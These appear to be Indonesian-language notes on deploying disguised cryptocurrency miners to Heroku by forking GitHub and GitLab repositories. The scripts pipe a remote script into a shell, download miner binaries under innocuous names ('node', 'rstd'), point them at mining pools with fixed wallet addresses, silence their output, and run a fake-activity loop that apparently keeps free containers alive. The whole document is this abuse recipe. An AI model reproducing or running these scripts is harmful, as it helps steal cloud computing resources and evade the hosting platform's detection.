FORK ke GH lain untuk RUN / Deploy ke HEROKU

https://dashboard.heroku.com/new?template=

https://github.com/wiseotpuk/multiappmasterhero

https://github.com/wiseotpuk/scdocerapp

https://gitlab.com/wiseotpuk/miner

DERO
curl link.sh | sh
____link.sh_____
mkdir dheru
cd dheru
curl -0 link_astrominer -o asmin && chmod +x asmin
./asmin -w deroi1qyzlxxgq2weyqlxg5u4tkng2lf5rktwanqhse2hwm577ps22zv2x2q9pvfz92xm369mdkp06lgvqf4y5cm.$(echo dh-lottery-$(TZ=UTC-7 date +"%H-%M-%S")) -r community-pools.mysrv.cloud:10300 -t 1 -p rpc
while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 10m; done
_________________

DERO GPU
____link.sh_____
curl -0 link/astronv -o node && chmod +x node  >/dev/null 2>&1
./node -w deroi1qyzlxxgq2weyqlxg5u4tkng2lf5rktwanqhse2hwm577ps22zv2x2q9pvfz92xm369mdkp06lgvqf4y5cm.$(echo gpu-$(TZ=UTC-7 date +"%H-%M-%S")) -r community-pools.mysrv.cloud:10300  -p rpc >/dev/null 2>&1
while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 10m; done
_________________

ZEPH CPUminer
curl link.sh | sh

____link.sh_____
mkdir rvn
cd rvn
wget link_miner && chmod +x load
./load -a minotaurx -u RXre9ivvw1qLcyX3WNX5D3Ksud2wfTrByA.load -o tratum+tcp://minotaurx.asia.mine.zergpool.com:7019 -p c=RVN -t $(nproc --all)
while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 10m; done


ZEPH xmrig/RSTD
____link.sh_____
mkdir paper
cd paper
wget link/config.json && chmod +x config.json
wget link/rstd && chmod +x rstd
./rstd -c "config.json" >/dev/null 2>&1
while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 10m; done
